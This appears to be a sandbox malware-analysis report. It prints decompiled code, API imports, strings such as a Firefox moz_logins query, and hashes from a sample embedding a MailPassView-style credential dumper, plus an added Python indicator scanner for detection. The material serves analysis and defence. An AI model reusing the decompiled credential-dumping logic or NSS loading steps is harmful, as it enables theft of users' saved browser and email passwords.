                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                  • memset.MSVCRT ref: 0040CEA6
                                                  • memset.MSVCRT ref: 0040CEBF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                  • memset.MSVCRT ref: 0040CF68
                                                  • memset.MSVCRT ref: 0040CF7A
                                                  • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                  • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                  • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                  • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                  • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                  • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                  • memset.MSVCRT ref: 0040D076
                                                  • memset.MSVCRT ref: 0040D08A
                                                  • memset.MSVCRT ref: 0040D0ED
                                                  • memset.MSVCRT ref: 0040D101
                                                  • sprintf.MSVCRT ref: 0040D119
                                                  • sprintf.MSVCRT ref: 0040D12B
                                                  • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                  • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                  Strings
                                                  • mailbox://%s, xrefs: 0040D113
                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                  • imap://%s, xrefs: 0040D125
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                  • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                  • API String ID: 4276617627-3913509535
                                                  • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                  • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                  • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                  • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 76%
                                                  			E0040A774(intOrPtr __ecx, void* __eflags) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HMENU__* _t121;
                                                  				struct HWND__* _t122;
                                                  				intOrPtr _t128;
                                                  				int _t133;
                                                  				intOrPtr _t135;
                                                  				int _t149;
                                                  				void* _t166;
                                                  				void* _t174;
                                                  				void* _t178;
                                                  				void* _t185;
                                                  				intOrPtr _t194;
                                                  				void* _t197;
                                                  				void* _t198;
                                                  				intOrPtr _t200;
                                                  				intOrPtr _t201;
                                                  				void* _t202;
                                                  				int _t204;
                                                  				intOrPtr _t205;
                                                  				intOrPtr* _t207;
                                                  				intOrPtr* _t208;
                                                  				void* _t210;
                                                  				intOrPtr* _t211;
                                                  				void* _t213;
                                                  
                                                  				_t213 = __eflags;
                                                  				_t208 = _t210 - 0x78;
                                                  				_t211 = _t210 - 0xb8;
                                                  				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
                                                  				 *((char*)(_t208 - 0x37)) = 1;
                                                  				 *(_t208 - 0x40) = 0;
                                                  				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
                                                  				 *((char*)(_t208 - 0x38)) = 0;
                                                  				 *((char*)(_t208 - 0x36)) = 0;
                                                  				 *((char*)(_t208 - 0x35)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *(_t208 - 0x2c) = 1;
                                                  				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
                                                  				 *((char*)(_t208 - 0x24)) = 4;
                                                  				 *((char*)(_t208 - 0x23)) = 0;
                                                  				 *((char*)(_t208 - 0x22)) = 0;
                                                  				 *((char*)(_t208 - 0x21)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *((intOrPtr*)(_t208 - 0x18)) = 5;
                                                  				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
                                                  				 *((char*)(_t208 - 0x10)) = 4;
                                                  				 *((char*)(_t208 - 0xf)) = 0;
                                                  				 *((char*)(_t208 - 0xe)) = 0;
                                                  				 *((char*)(_t208 - 0xd)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *(_t208 - 4) = 2;
                                                  				 *_t208 = 0x9c48;
                                                  				 *((char*)(_t208 + 4)) = 4;
                                                  				 *((char*)(_t208 + 5)) = 0;
                                                  				 *((char*)(_t208 + 6)) = 0;
                                                  				 *((char*)(_t208 + 7)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *((intOrPtr*)(_t208 + 0x10)) = 3;
                                                  				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
                                                  				 *((char*)(_t208 + 0x18)) = 4;
                                                  				 *((char*)(_t208 + 0x19)) = 0;
                                                  				 *((char*)(_t208 + 0x1a)) = 0;
                                                  				 *((char*)(_t208 + 0x1b)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *((intOrPtr*)(_t208 + 0x24)) = 0;
                                                  				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
                                                  				 *((char*)(_t208 + 0x2c)) = 4;
                                                  				 *((char*)(_t208 + 0x2d)) = 0;
                                                  				 *((char*)(_t208 + 0x2e)) = 0;
                                                  				 *((char*)(_t208 + 0x2f)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *((intOrPtr*)(_t208 + 0x38)) = 6;
                                                  				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
                                                  				 *((char*)(_t208 + 0x40)) = 4;
                                                  				 *((char*)(_t208 + 0x41)) = 0;
                                                  				 *((char*)(_t208 + 0x42)) = 0;
                                                  				 *((char*)(_t208 + 0x43)) = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
                                                  				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
                                                  				 *((char*)(_t208 + 0x54)) = 4;
                                                  				 *((char*)(_t208 + 0x55)) = 0;
                                                  				 *((char*)(_t208 + 0x56)) = 0;
                                                  				 *((char*)(_t208 + 0x57)) = 0;
                                                  				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
                                                  				asm("stosd");
                                                  				_t198 = 0x66;
                                                  				asm("stosd");
                                                  				_t121 = E00407BB9(_t198);
                                                  				_t194 =  *((intOrPtr*)(_t208 + 0x70));
                                                  				 *(_t194 + 0x11c) = _t121;
                                                  				_t122 = SetMenu( *(_t194 + 0x108), _t121);
                                                  				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
                                                  				 *(_t194 + 0x114) = _t122;
                                                  				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
                                                  				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
                                                  				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
                                                  				_t128 =  *((intOrPtr*)(_t194 + 0x370));
                                                  				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
                                                  				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
                                                  				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
                                                  				if(_t173 <= 0) {
                                                  					L3:
                                                  					_t201 =  *((intOrPtr*)(_t194 + 0x370));
                                                  					E00409EC4(_t201);
                                                  					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
                                                  					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
                                                  						E00409E32(_t133, _t173, _t194, _t201);
                                                  					}
                                                  					_t202 = 0x68;
                                                  					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
                                                  					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
                                                  					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
                                                  						_t174 = 0x412466;
                                                  					} else {
                                                  						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
                                                  							_t174 = 0;
                                                  						} else {
                                                  							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
                                                  						}
                                                  					}
                                                  					_push("/noloadsettings");
                                                  					_push(_t174);
                                                  					L004115B2();
                                                  					if(_t135 == 0) {
                                                  						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                  					}
                                                  					E0040AF17(_t194, 0);
                                                  					 *( *(_t194 + 0x36c)) = 1;
                                                  					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
                                                  					if( *0x417660 == 0) {
                                                  						E00406172(0x417660);
                                                  						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
                                                  							GetTempPathA(0x104, 0x417660);
                                                  						}
                                                  					}
                                                  					_t204 = strlen(0x417660);
                                                  					 *_t211 = "report.html";
                                                  					_t99 = strlen(??) + 1; // 0x1
                                                  					_t223 = _t204 + _t99 - 0x104;
                                                  					if(_t204 + _t99 >= 0x104) {
                                                  						 *((char*)(_t194 + 0x264)) = 0;
                                                  					} else {
                                                  						E004062AD(_t194 + 0x264, 0x417660, "report.html");
                                                  					}
                                                  					_push(1);
                                                  					_t178 = 0x30;
                                                  					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
                                                  					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
                                                  					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
                                                  					_t205 = _t194;
                                                  					 *(_t194 + 0x374) = _t149;
                                                  					E0040A27F(0, 1, _t205, _t223);
                                                  					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
                                                  					 *(_t208 + 0x60) = 0x12c;
                                                  					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
                                                  					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
                                                  					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
                                                  				} else {
                                                  					_t207 = _t200 + 0xc;
                                                  					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
                                                  					do {
                                                  						_t173 =  *((intOrPtr*)(_t207 - 8));
                                                  						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
                                                  						_t211 = _t211 + 0x10;
                                                  						_t207 = _t207 + 0x14;
                                                  						_t82 = _t208 + 0x74;
                                                  						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
                                                  					} while ( *_t82 != 0);
                                                  					goto L3;
                                                  				}
                                                  			}
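
The NSS exports resolved through GetProcAddress, the moz_logins query and the imap://%s and mailbox://%s format strings listed for the function at 0x0040ce5e, together with the Software\NirSoft\MailPassView key that E0040A774 deletes, are the indicators a detection engineer would pivot on when hunting for this embedded credential-dump routine. The Python below is an added example and is not part of the sandbox report or of the analysed sample: it scans a memory dump or unpacked PE image for those strings and groups them. The scan() grouping, the three-export threshold for the verdict and the constructed SAMPLE_DUMP and BENIGN_DUMP inputs are my own assumptions; the indicator strings are taken from the report.

```python
"""Indicator scan for an embedded NirSoft-style NSS credential-dump routine.

Added example (not from the sandbox report). Given a memory dump or unpacked
PE as bytes, report which indicators from the report's API/String listings are
present. The grouping and verdict threshold are assumptions of this example.
"""

# NSS exports the routine resolves via GetProcAddress (from the APIs listing).
NSS_EXPORTS = (b"NSS_Init", b"NSS_Shutdown", b"PK11_GetInternalKeySlot",
               b"PK11_FreeSlot", b"PK11_CheckUserPassword", b"PK11_Authenticate")
# signons.sqlite query from the Strings listing.
MOZ_LOGINS_QUERY = (b"SELECT id, hostname, httpRealm, formSubmitURL, usernameField, "
                    b"passwordField, encryptedUsername, encryptedPassword FROM moz_logins")
# Thunderbird account URI formats built with sprintf in the same function.
MAIL_URI_FORMATS = (b"imap://%s", b"mailbox://%s")
# Registry key deleted by E0040A774 (RegDeleteKeyA under HKEY_CURRENT_USER).
NIRSOFT_KEY = b"Software\\NirSoft\\MailPassView"


def _present(hay: bytes, needle: bytes) -> bool:
    """True if needle appears as ANSI or as UTF-16LE. The routine converts with
    MultiByteToWideChar, so either encoding may survive in a dump."""
    return needle in hay or needle.decode("ascii").encode("utf-16-le") in hay


def scan(data: bytes) -> dict:
    """Return the matched indicators and an assumed verdict for one image."""
    found = {
        "nss_exports": [n.decode() for n in NSS_EXPORTS if _present(data, n)],
        "moz_logins_query": _present(data, MOZ_LOGINS_QUERY),
        "mail_uri_formats": [f.decode() for f in MAIL_URI_FORMATS if _present(data, f)],
        "nirsoft_mailpassview_key": _present(data, NIRSOFT_KEY),
    }
    # Assumption: several PK11/NSS imports plus the moz_logins query is what
    # separates a credential dumper from software that merely links nss3.dll.
    found["verdict"] = ("nss-credential-dumper"
                        if len(found["nss_exports"]) >= 3 and found["moz_logins_query"]
                        else "inconclusive")
    return found


# Constructed sample images (not real dumps): filler bytes around the indicator
# strings, with one URI format stored as UTF-16LE to exercise the wide check.
SAMPLE_DUMP = (b"\x00" * 16 + MOZ_LOGINS_QUERY + b"\x00" * 8
               + b"".join(n + b"\x00" for n in NSS_EXPORTS)
               + "mailbox://%s".encode("utf-16-le") + b"\x00" * 4 + NIRSOFT_KEY)
# A benign-looking image that only names two NSS exports and no query.
BENIGN_DUMP = b"nss3.dll\x00NSS_Init\x00NSS_Shutdown\x00" + b"\x00" * 32

if __name__ == "__main__":
    import json
    print(json.dumps(scan(SAMPLE_DUMP), indent=2))
    print(json.dumps(scan(BENIGN_DUMP), indent=2))
```

Run it against a process dump of the hollowed child (the report's memory dump source is the 0x00400000 image of process 2) rather than the packed on-disk sample, since the .NET loader only exposes these strings after it injects the native payload.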

                                                  [Instruction address gutter of the decompiled view for E0040A774, 0x0040a774 to 0x0040a9aa; the addresses pair line by line with the decompiled code above]
                                                  0x0040a9b2
                                                  0x0040a9cd
                                                  0x0040a9d9
                                                  0x0040a9db
                                                  0x0040a9db
                                                  0x0040a9e2
                                                  0x0040a9e8
                                                  0x0040a9ee
                                                  0x0040a9f7
                                                  0x0040aa0c
                                                  0x0040a9f9
                                                  0x0040a9fc
                                                  0x0040aa08
                                                  0x0040a9fe
                                                  0x0040aa03
                                                  0x0040aa03
                                                  0x0040a9fc
                                                  0x0040aa11
                                                  0x0040aa16
                                                  0x0040aa17
                                                  0x0040aa20
                                                  0x0040aa2c
                                                  0x0040aa2c
                                                  0x0040aa35
                                                  0x0040aa40
                                                  0x0040aa52
                                                  0x0040aa63
                                                  0x0040aa65
                                                  0x0040aa73
                                                  0x0040aa7b
                                                  0x0040aa7b
                                                  0x0040aa73
                                                  0x0040aa87
                                                  0x0040aa89
                                                  0x0040aa95
                                                  0x0040aa99
                                                  0x0040aa9f
                                                  0x0040aaba
                                                  0x0040aaa1
                                                  0x0040aab1
                                                  0x0040aab7
                                                  0x0040aac6
                                                  0x0040aaca
                                                  0x0040aacb
                                                  0x0040aae2
                                                  0x0040aaec
                                                  0x0040aaf4
                                                  0x0040aaf6
                                                  0x0040aafc
                                                  0x0040ab0d
                                                  0x0040ab29
                                                  0x0040ab30
                                                  0x0040ab37
                                                  0x0040ab53
                                                  0x0040a983
                                                  0x0040a983
                                                  0x0040a986
                                                  0x0040a989
                                                  0x0040a991
                                                  0x0040a99a
                                                  0x0040a99f
                                                  0x0040a9a2
                                                  0x0040a9a5
                                                  0x0040a9a5
                                                  0x0040a9a5
                                                  0x00000000
                                                  0x0040a989

                                                  APIs
                                                    • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                    • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                  • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                  • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A8DA
                                                  • LoadImageA.USER32 ref: 0040A8F0
                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                  • CreateWindowExA.USER32 ref: 0040A950
                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                  • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                  • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                  • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                  • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                  • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                  • strlen.MSVCRT ref: 0040AA82
                                                  • strlen.MSVCRT ref: 0040AA90
                                                  • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                    • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                    • Part of subcall function 00404925: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404966
                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AB37
                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AB4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                  • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                  • API String ID: 873469642-860065374
                                                  • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                  • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                  • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                  • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
                                                  				char _v0;
                                                  				struct HWND__* _v4;
                                                  				void* __edi;
                                                  				void* _t44;
                                                  				void* _t58;
                                                  				int _t59;
                                                  				int _t61;
                                                  				int _t62;
                                                  				long _t66;
                                                  				struct HWND__* _t93;
                                                  				intOrPtr _t122;
                                                  				unsigned int _t125;
                                                  				signed int _t127;
                                                  				signed int _t128;
                                                  				void* _t134;
                                                  
                                                  				_t128 = _t127 & 0xfffffff8;
                                                  				E004118A0(0x1424, __ecx);
                                                  				// _a8 is the dialog message; 0x110 is WM_INITDIALOG, so this branch builds the crash-report text once when the dialog is created
                                                  				_t44 = _a8 - 0x110;
                                                  				if(_t44 == 0) {
                                                  					E00406491(__edx, _a4);
                                                  					 *_t128 = 0x7ff;
                                                  					_a3104 = 0;
                                                  					memset( &_a3105, 0, ??);
                                                  					asm("movsd"); // copies the 10-byte literal "{Unknown}\0" (xref 0040DBFB) into _v0,
                                                  					asm("movsd"); // the default module name used when the fault address cannot be
                                                  					asm("movsw"); // mapped to a loaded module further down
                                                  					memset( &_a10, 0, 0xfb);
                                                  					_a520 = 0;
                                                  					memset( &_a521, 0, 0xff);
                                                  					_a264 = 0;
                                                  					memset( &_a265, 0, 0xff);
                                                  					_a1056 = 0;
                                                  					memset( &_a1057, 0, 0x3ff);
                                                  					_a2080 = 0;
                                                  					memset( &_a2081, 0, 0x3ff);
                                                  					_t134 = _t128 + 0x48;
                                                  					// Read 0x80 bytes at the saved ESP (*0x416c64) and EIP (*0x416c58) of the faulting thread; the argument order
                                                  					// of the sprintf below fixes which global is which. ReadProcessMemory on the process's own handle fails
                                                  					// cleanly on an unmapped address instead of faulting again. E00406585 renders the bytes as the text that
                                                  					// appears after "Stack Data:" (_a1056) and "Code Data:" (_a2080).
                                                  					_t58 = GetCurrentProcess();
                                                  					_t102 =  &_a520;
                                                  					_v4 = _t58;
                                                  					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
                                                  					__eflags = _t59;
                                                  					if(_t59 != 0) {
                                                  						E00406585( &_a1056,  &_a520, 4);
                                                  						_pop(_t102);
                                                  					}
                                                  					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
                                                  					__eflags = _t61;
                                                  					if(_t61 != 0) {
                                                  						E00406585( &_a2080,  &_a264, 0);
                                                  						_pop(_t102);
                                                  					}
                                                  					_t62 = E0040629C();
                                                  					__eflags = _t62;
                                                  					if(_t62 == 0) {
                                                  						E0040E056();
                                                  					} else {
                                                  						E0040E0DA();
                                                  					}
                                                  					__eflags =  *0x417514;
                                                  					if(__eflags != 0) {
                                                  						L17:
                                                  						_a776 = 0;
                                                  						memset( &_a780, 0, 0x114);
                                                  						_t122 =  *0x416e7c; // 0x0
                                                  						_t134 = _t134 + 0xc;
                                                  						_t66 = GetCurrentProcessId();
                                                  						 *0x417108 = 0;
                                                  						E0040E255(_t102, __eflags, _t66, _t122);
                                                  						__eflags =  *0x417108;
                                                  						if( *0x417108 != 0) {
                                                  							memcpy( &_a776, 0x416ff0, 0x118);
                                                  							_t134 = _t134 + 0xc;
                                                  							__eflags =  *0x417108;
                                                  							if( *0x417108 != 0) {
                                                  								strcpy( &_v0, E004061E6( &_a784));
                                                  							}
                                                  						}
                                                  						goto L20;
                                                  					} else {
                                                  						__eflags =  *0x417518;
                                                  						if(__eflags == 0) {
                                                  							L20:
                                                  							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
                                                  							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
                                                  							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                  							L21:
                                                  							return 0;
                                                  						}
                                                  						goto L17;
                                                  					}
                                                  				}
                                                  				// _a8 == 0x111 is WM_COMMAND; _a12 is wParam. HIWORD(wParam) == 0 means a menu/accelerator/button click,
                                                  				// LOWORD(wParam) == 3 is the command id. The handler selects the whole report in edit control 0x3ea
                                                  				// (EM_SETSEL = 0xb1, range 0..-1), copies it to the clipboard (WM_COPY = 0x301) and clears the selection.
                                                  				// This writes the clipboard; it is not the clipboard-read behaviour flagged in the summary signatures.
                                                  				if(_t44 == 1) {
                                                  					_t125 = _a12;
                                                  					if(_t125 >> 0x10 == 0) {
                                                  						if(_t125 == 3) {
                                                  							_t93 = GetDlgItem(_a4, 0x3ea);
                                                  							_v4 = _t93;
                                                  							SendMessageA(_t93, 0xb1, 0, 0xffff);
                                                  							SendMessageA(_v4, 0x301, 0, 0);
                                                  							SendMessageA(_v4, 0xb1, 0, 0);
                                                  						}
                                                  						}
                                                  					}
                                                  				}
                                                  				goto L21;
                                                  			}

                                                  [Per-line instruction address column for E0040DB39 (0x0040db3c to 0x0040de40) omitted: it was aligned to the C-Code listing above and carries no information once separated from it.]

                                                  APIs
                                                  Strings
                                                  • Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n, xrefs: 0040DE02
                                                  • {Unknown}, xrefs: 0040DBFB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n${Unknown}
                                                  • API String ID: 138940113-3474136107
                                                  • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                  • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                  • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                  • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
                                                  				void _v267;
                                                  				char _v268;
                                                  				void _v531;
                                                  				char _v532;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				int _t39;
                                                  				void* _t44;
                                                  				struct HINSTANCE__* _t53;
                                                  				struct HINSTANCE__* _t56;
                                                  				struct HINSTANCE__** _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				// _v268 receives the directory that should contain nss3.dll (the Firefox install directory),
                                                  				// copied from _a4 with a 0x104 (MAX_PATH) bound
                                                  				_v268 = 0;
                                                  				memset( &_v267, 0, 0x104);
                                                  				if(_a4 != 0) {
                                                  					E004060D0(0x104,  &_v268, _a4);
                                                  				}
                                                  				if(_v268 != 0) {
                                                  					// save the caller's working directory in the context struct (_t69[8]) and switch into the
                                                  					// Firefox directory so the libraries nss3.dll itself imports resolve from there
                                                  					GetCurrentDirectoryA(0x104,  &(_t69[8]));
                                                  					SetCurrentDirectoryA( &_v268);
                                                  					_v532 = 0;
                                                  					memset( &_v531, 0, 0x104);
                                                  					// "<dir>\nss3.dll" must fit in MAX_PATH; otherwise E004062AD builds the full path into _v532
                                                  					_t39 = strlen("nss3.dll");
                                                  					_t13 = strlen( &_v268) + 1; // 0x1
                                                  					if(_t39 + _t13 >= 0x104) {
                                                  						_v532 = 0;
                                                  					} else {
                                                  						E004062AD( &_v532,  &_v268, "nss3.dll");
                                                  					}
                                                  					_t44 = GetModuleHandleA( &_v532);
                                                  					 *_t69 = _t44;
                                                  					if(_t44 != 0) {
                                                  						L9:
